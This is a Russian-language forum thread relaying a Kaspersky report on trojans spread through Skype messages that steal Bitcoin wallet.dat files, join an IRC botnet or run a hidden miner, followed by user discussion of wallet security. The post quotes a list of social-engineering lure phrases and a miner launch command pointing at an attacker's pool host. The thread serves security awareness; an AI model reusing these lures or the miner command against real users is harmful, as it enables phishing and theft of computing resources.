Jump to content
Sign in to follow this  
polym0rph

Рассылка по Skype трояна, ворующего Bitcoin

Recommended Posts

04 апреля Лаборатория Касперского сообщила, что обнаружила трояна, который распространяется через Skype рассылкой сообщений типа

- Я не могу спать после увиденного: http://www.goo.gl/XXXXX?image=IMG0540250-JPG
- Что ты думаешь об этой картинке, которую я отредактировал http://www.goo.gl/XXXXX?image=IMG0540250-JPG

 Вот еще список фраз, которыми пользуются злоумышленники, применяя навыки социальной инженерии:
hahaha
Is this you?
Picture of you?
Tell me what you think of this picture
This is the funniest picture ever!
I cant believe I still have this picture
Someone showed me your picture
Your photo isn't really that great
I love your picture!
What do you think of my new hair?
You look so beautiful on this picture
You should take a look at this picture
Take a look at my new picture please
What you think of this picture?
Should I upload this picture on facebook?
Someone told me it's your picture

Сервис сокравщения ссылок Goo.gl показывает, что на данный момент было уже более 170k кликов по этой ссылке, а час назад было 160k, то есть в среднем это 10k кликов в час или 2ю7 клика каждую секунду!
 
Сам троян ворует wallet.dat и подключает компьютер к ботнету, управляющемся по IRC. Сам троян написан на VB, тело трояна можно найтипо этому пути:

C:\Users\s\Desktop\Must Use Different Name\HqwKH\avivah.vbp
 
Больше всего заражений пришлось на Россию и Украину.
 
208194207.png

 

С следующем сообщении уже говорится о другом трояне, который также рассылается аналогичным способом через Skype.

 

Он запускает на компьютере жертвы майнер, который зарабатывает на счет злоумышленника. Приведена команда запуска:

bitcoin-miner.exe -a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u [email protected] -p XXXXXXXX

 

Мораль сей басни: ответственнее относитесь к безопасности на своем компьютере и помните, что за сохранность своих средств в Bitcoin  отвечаете только вы сами.

Share this post


Link to post
Share on other sites

если кошель зашифрован это поможет?

Share this post


Link to post
Share on other sites

поможет , пока ключ не подберут... :ph34r:

Share this post


Link to post
Share on other sites

 

если кошель зашифрован это поможет?

Да, если троян тупой. А так никто не мешает злоумышленнику в троян внедрить кейлоггер, который считает все, что вводится с клавиатуры, и таким образом получить пароль. Некоторые товарищи из-за этого свои пароли вводят мышкой с помощью экранной клавиатуры. На что зловредописатели стали делать снимки экрана периодические или по какому-то триггеру. Короче, война технологий.

 

Я рекомендую кошелек вообще держать на отдельном компьютере, или, хотя бы, виртуалке, как описано в статье про безопасное хранение кошелька.

Share this post


Link to post
Share on other sites

 держать на отдельном компьютере, 

Отдельном от чего?  :)

Share this post


Link to post
Share on other sites

Отдельном от чего?  :)

Отдельном от основного, я полагаю.

Share this post


Link to post
Share on other sites

@Extendz,

Да, правильно. Почему-то у бухгалтеров не возникает идеи держать систему банк-клиент на компьютере где серфят в сети, играют в игрушки, качают торренты  и т.п., а народ у нас спокойно держит кошельки с приличными суммами.

Share this post


Link to post
Share on other sites

Меня неправильно поняли маленько, я имел ввиду, что вообще лучше от инета отрубиться совсем. Шутканул, так сказать, неудачно... :-(

Share this post


Link to post
Share on other sites

Хм... При клике по подобной ссылке скайп сам скачивает и запускает файл? Или используются уязвимости браузеров?

Share this post


Link to post
Share on other sites

Диву дался когда прочитал, сори что вешаю ссылки...думаю не удалят....мне интересны мысли пользователей

http://respublika-kz.info/news/society/29727/

http://www.securelist.com/ru/blog/207764586/Lavinoobraznaya_ataka

http://www.securelist.com/ru/blog/207764587/Skype_mageddon_radi_dobychi_bitkoinov

Share this post


Link to post
Share on other sites

В статье лаб каспера дает интересные данные....кто то усердно разными способами, с 1 марта закидывает майнера на компы жертв-отсюда + ЖИРНЫЙ к общему росту....вообщем голова есть --выводы за Вами...мне будет интересно



1 ссылка с инфосайта

2 с сайта касперыча хрыча

Share this post


Link to post
Share on other sites

А не является ли только это, распространение вируса-майнера нашим долгожданным и таинственным  " ASIC  майнером"  который сложность сети до небес повышает ? .  Радует   это лохотронщиков,  которые якобы вот вот уже  с ноября 2012 каждую неделю  обещают  начинать отгрузку несуществующего  ASIC продукта  ? 

Кто-нибудь видел кого-нибудь , кто видел   ASIC  майнера :D  ?

Edited by Nirton

Share this post


Link to post
Share on other sites

Ну про кражу кошелька тред тут 

 

Ну а второе - обычный ботнет, он был, есть и будет. 

Share this post


Link to post
Share on other sites

"А скайп не нужен, родной"

Share this post


Link to post
Share on other sites

Ужс. Не думал, что bitcoin настолько распространен и актуален, что его воруют.

Я думал это больше дорогое хобби "кто рукастее" и баловство у кого железо мощнее)

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...